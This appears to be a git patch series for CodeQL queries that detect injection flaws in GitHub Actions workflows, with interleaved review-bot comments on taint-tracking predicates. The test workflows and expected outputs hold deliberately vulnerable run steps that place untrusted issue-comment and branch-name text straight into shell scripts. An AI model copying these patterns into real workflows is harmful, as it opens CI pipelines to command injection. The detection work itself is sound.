be1559d4711..3128aacc93c 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml 
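Review bot: `getPermission` only reads scalar values out of a mapping (`n.lookup(perm).(YamlScalar)`), so the shorthand forms `permissions: write-all` and `permissions: read-all` are not visible through `getAPermission()`. Whether a `Permissions` node is created at all for a scalar value depends on code outside this hunk. Since `Workflow.isPrivileged()` now tests `getAPermission() = "write"`, a `write-all` workflow would not satisfy it. Both predicates also lack QLDoc; `/** Gets the access level (for example "read" or "write") declared for scope perm. */` on `getPermission` and `/** Gets the access level declared for any scope. */` on `getAPermission` would cover it.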
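Review bot: `fieldName` in `SecretsExpressionImpl` is captured exactly as written in the workflow, and `Workflow.isPrivileged()` compares it with the literal `"GITHUB_TOKEN"`. GitHub treats secret names case-insensitively, so `${{ secrets.github_token }}` would be counted as a custom secret and could mark an otherwise unprivileged workflow as privileged. Comparing with `expr.getFieldName().toUpperCase() = "GITHUB_TOKEN"` at the call site avoids that without changing what `getFieldName()` returns to other users. The QLDoc opens with "Holds for", which is the predicate convention; for a class it should read `An expression accessing the secrets context, e.g. ${{ secrets.FOO }}.`, which also fixes the "accesing" typo.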
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml @@ -8,7 +8,7 @@ on: permissions: actions: read checks: read - contents: read + contents: write jobs: echo_trigger: From 29cef4fd7358cf329d111cd616cff2611b59097c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Apr 2024 16:24:51 +0200 Subject: [PATCH 0169/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index aa02154bab1..f5b3952ce96 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.9 +version: 0.0.10 dependencies: codeql/controlflow: "*" codeql/dataflow: "*" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 134b0db2b17..7c1cc78df4a 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.9 +version: 0.0.10 groups: - actions - queries From 2925380e72bdc2174b33db84e5a5c12d6cc7982e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Apr 2024 16:27:40 +0200 Subject: [PATCH 0170/1267] Remove dummy models --- ql/lib/ext/TEST-RW-MODELS.model.yml | 17 ----------------- 1 file changed, 17 deletions(-) delete mode 100644 ql/lib/ext/TEST-RW-MODELS.model.yml diff --git a/ql/lib/ext/TEST-RW-MODELS.model.yml b/ql/lib/ext/TEST-RW-MODELS.model.yml deleted file mode 100644 index 65952bccb35..00000000000 --- a/ql/lib/ext/TEST-RW-MODELS.model.yml +++ /dev/null 
@@ -1,17 +0,0 @@ -extensions: - - addsTo: - pack: githubsecuritylab/actions-all - extensible: summaryModel - data: - - ["octo-org/this-repo/.github/workflows/workflow.yml", "*", "input.config-path", "output.workflow-output", "taint", "manual"] - - ["octo-org/summary-repo/.github/workflows/workflow.yml", "*", "input.config-path", "output.workflow-output", "taint", "manual"] - - addsTo: - pack: githubsecuritylab/actions-all - extensible: sourceModel - data: - - ["octo-org/source-repo/.github/workflows/workflow.yml", "*", "output.workflow-output", "Foo", "manual"] - - addsTo: - pack: githubsecuritylab/actions-all - extensible: sinkModel - data: - - ["octo-org/sink-repo/.github/workflows/workflow.yml", "*", "input.config-path", "code-injection", "manual"] From db86c40c5066cfb211926b4715741af6841c885c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Apr 2024 13:07:40 +0200 Subject: [PATCH 0171/1267] Enable dataflow through GITHUB_ENV vars --- ql/lib/codeql/actions/Ast.qll | 4 +- ql/lib/codeql/actions/ast/internal/Ast.qll | 3 + .../codeql/actions/dataflow/FlowSources.qll | 2 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 90 +-- .../dataflow/internal/DataFlowPrivate.qll | 14 +- .../security/ArtifactPoisoningQuery.qll | 16 +- .../actions/security/EnvVarInjectionQuery.qll | 2 +- .../.github/workflows/multiline.yml | 40 +- ql/test/library-tests/test.expected | 523 +++++++++++++++++- .../CWE-077/.github/workflows/test4.yml | 17 +- .../Security/CWE-077/EnvVarInjection.expected | 6 + .../PrivilegedEnvVarInjection.expected | 8 + .../Security/CWE-094/CodeInjection.expected | 4 +- .../CWE-094/PrivilegedCodeInjection.expected | 4 +- 14 files changed, 656 insertions(+), 77 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 91ee95a90ab..edee4d03eb4 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -25,7 +25,7 @@ module Utils { } bindingset[line, var] - private predicate extractLineAssignment(string line, string var, string key, string value) { + predicate extractLineAssignment(string line, string var, string key, string value) { exists(string assignment | // single line assignment assignment = @@ -59,7 +59,7 @@ module Utils { } bindingset[script, var] - private predicate extractMultilineAssignment(string script, string var, string key, string value) { + predicate extractMultilineAssignment(string script, string var, string key, string value) { // multiline assignment exists(string flattenedScript | flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 300377536d6..a66befe7d7d 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1010,6 +1010,9 @@ class EnvExpressionImpl extends SimpleReferenceExpressionImpl { s.getInScopeEnvVarExpr(fieldName) = result and s.getAChildNode*() = this ) + or + // Some Run steps may store taint in the enclosing job so we need to check the enclosing job + result = this.getEnclosingJob() } } diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 01aa8bbc320..c937aaa550b 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -170,7 +170,7 @@ private class CompositeActionInputSource extends RemoteFlowSource { * A downloadeded artifact. */ private class ArtifactToOptionSource extends RemoteFlowSource { - ArtifactToOptionSource() { this.asExpr() instanceof ArtifactDownloadStep } + ArtifactToOptionSource() { this.asExpr() instanceof UntrustedArtifactDownloadStep } override string getSourceType() { result = "Step output from Artifact" } } 
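Review bot: The disjunct added to `EnvExpressionImpl.getTarget()`, `result = this.getEnclosingJob()`, carries no condition. Every `env.*` expression now targets its job whether or not any step in that job writes to `GITHUB_ENV`, and regardless of whether the writing step runs before the reading one. Variables written to `GITHUB_ENV` are only visible to later steps of the same job, so a read that precedes the write could be reported as tainted; whether the field-name content check elsewhere limits this cannot be seen from this hunk. At minimum the existing comment should state the approximation, for example `// Over-approximation: step order is not checked, so a read placed before the GITHUB_ENV write also resolves to the job`, and a test with the read before the write would pin the intended behaviour. The member predicate starts above the hunk.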
diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 3988f2190ab..4e049615045 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -22,28 +22,6 @@ class AdditionalTaintStep extends Unit { abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); } -/** - * Holds if a Run step declares an environment variable, uses it in its script and sets an output in its script. - * e.g. - * - name: Extract and Clean Initial URL - * id: extract-url - * env: - * BODY: ${{ github.event.comment.body }} - * run: | - * echo "::set-output name=foo::$BODY" - * echo "foo=$(echo $BODY)" >> $GITHUB_OUTPUT - * echo "foo=$(echo $BODY)" >> "$GITHUB_OUTPUT" - */ -predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string varName, string key, string value | - c = any(DataFlow::FieldContent ct | ct.getName() = key.replaceAll("output\\.", "")) and - run.getInScopeEnvVarExpr(varName) = pred.asExpr() and - Utils::writeToGitHubOutput(run, key, value) and - value.matches("%$" + ["", "{", "ENV{"] + varName + "%") and - succ.asExpr() = run - ) -} - /** * Holds if a Run step declares an environment variable, uses it in its script to set another env var. * e.g. 
@@ -65,35 +43,79 @@ class EnvToRunTaintStep extends AdditionalTaintStep { override predicate step(DataFlow::Node node1, DataFlow::Node node2) { envToRunStep(node1, node2) } } +/** + * Holds if a Run step declares an environment variable, uses it in its script and sets an output in its script. + * e.g. + * - name: Extract and Clean Initial URL + * id: extract-url + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * echo "::set-output name=foo::$BODY" + * echo "foo=$(echo $BODY)" >> $GITHUB_OUTPUT + * echo "foo=$(echo $BODY)" >> "$GITHUB_OUTPUT" + */ +predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { + exists(Run run, string varName, string key, string value | + c = any(DataFlow::FieldContent ct | ct.getName() = key) and + pred.asExpr() = run.getInScopeEnvVarExpr(varName) and + succ.asExpr() = run and + Utils::writeToGitHubOutput(run, key, value) and + value.matches("%$" + ["", "{", "ENV{"] + varName + "%") + ) +} + +predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { + exists(Run run, string varName, string key, string value | + c = any(DataFlow::FieldContent ct | ct.getName() = key) and + pred.asExpr() = run.getInScopeEnvVarExpr(varName) and + // we store the taint on the enclosing job since the may not exist an implicit env attribute + succ.asExpr() = run.getEnclosingJob() and + Utils::writeToGitHubEnv(run, key, value) and + value.matches("%$" + ["", "{", "ENV{"] + varName + "%") + ) +} + /** * A downloaded artifact that gets assigned to a Run step output. 
* - uses: actions/download-artifact@v2 * - run: echo "::set-output name=id::$(> $GITHUB_OUTPUT - echo -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT - echo "CHANGELOGEOF" >> $GITHUB_OUTPUT - run: | - EOF=$(dd if=/dev/urandom bs=15 count=1 status=none | base64) - echo "status<<$EOF" >> $GITHUB_OUTPUT - echo "$(cat status.output.json)" >> $GITHUB_OUTPUT - echo "$EOF" >> $GITHUB_OUTPUT - run: | - echo "response<<$EOF" >> $GITHUB_OUTPUT - echo $output >> $GITHUB_OUTPUT - echo "$EOF" >> $GITHUB_OUTPUT - run: | - { - echo 'JSON_RESPONSE<> "$GITHUB_ENV" + echo "changelog<> $GITHUB_OUTPUT + echo -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT + echo "CHANGELOGEOF" >> $GITHUB_OUTPUT + - run: | + EOF=$(dd if=/dev/urandom bs=15 count=1 status=none | base64) + echo "status<<$EOF" >> $GITHUB_OUTPUT + echo "$(cat status.output.json)" >> $GITHUB_OUTPUT + echo "$EOF" >> $GITHUB_OUTPUT + - run: | + echo "response<<$EOF" >> $GITHUB_OUTPUT + echo $output >> $GITHUB_OUTPUT + echo "$EOF" >> $GITHUB_OUTPUT + - run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" + - run: | + cat <<-"EOF" > event.json + ${{ toJson(github.event) }} + EOF diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index a6be2226b8c..c08d4c824e1 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected 
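Review bot: In the new `envToEnvStoreStep`, and in the moved `envToOutputStoreStep`, the test `value.matches("%$" + ["", "{", "ENV{"] + varName + "%")` is a LIKE-style substring match. An `_` in `varName` matches any character and `$BODY` also matches `$BODY_CLEAN`, so a write that uses a different, possibly sanitized variable can be linked to the tainted one. A bounded match, something like `value.regexpMatch("(?s).*\\$(\\{|ENV\\{)?" + varName + "\\b.*")`, would keep the three accepted prefixes while requiring the name to end there. `envToEnvStoreStep` also has no QLDoc although its sibling carries a worked example; a matching block showing an `echo "FOO=$BODY" >> $GITHUB_ENV` step would help. Its inline comment "since the may not exist an implicit env attribute" should read "since there may not be an explicit env attribute". The remainder of this hunk is not visible on the page.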
@@ -1,2 +1,521 @@ -ERROR: Could not resolve predicate extractLineAssignment/4 (test.ql:85,5-33) -ERROR: Could not resolve predicate extractLineAssignment/4 (test.ql:103,5-33) +files +| .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | +| .github/workflows/multiline.yml:0:0:0:0 | .github/workflows/multiline.yml | +| .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | +workflows +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/test.yml:1:1:40:53 | on: push | +reusableWorkflows +compositeActions +jobs +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +localJobs +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +extJobs +steps +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| 
.github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +runSteps +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| 
.github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | +runExprs +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | 
.github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +uses +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +stepUses +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +usesArgs +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +runStepChildren +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo 
'${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:13:39:16 | sink | 
+| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +parentNodes +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | 
.github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | 
.github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | 
.github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | 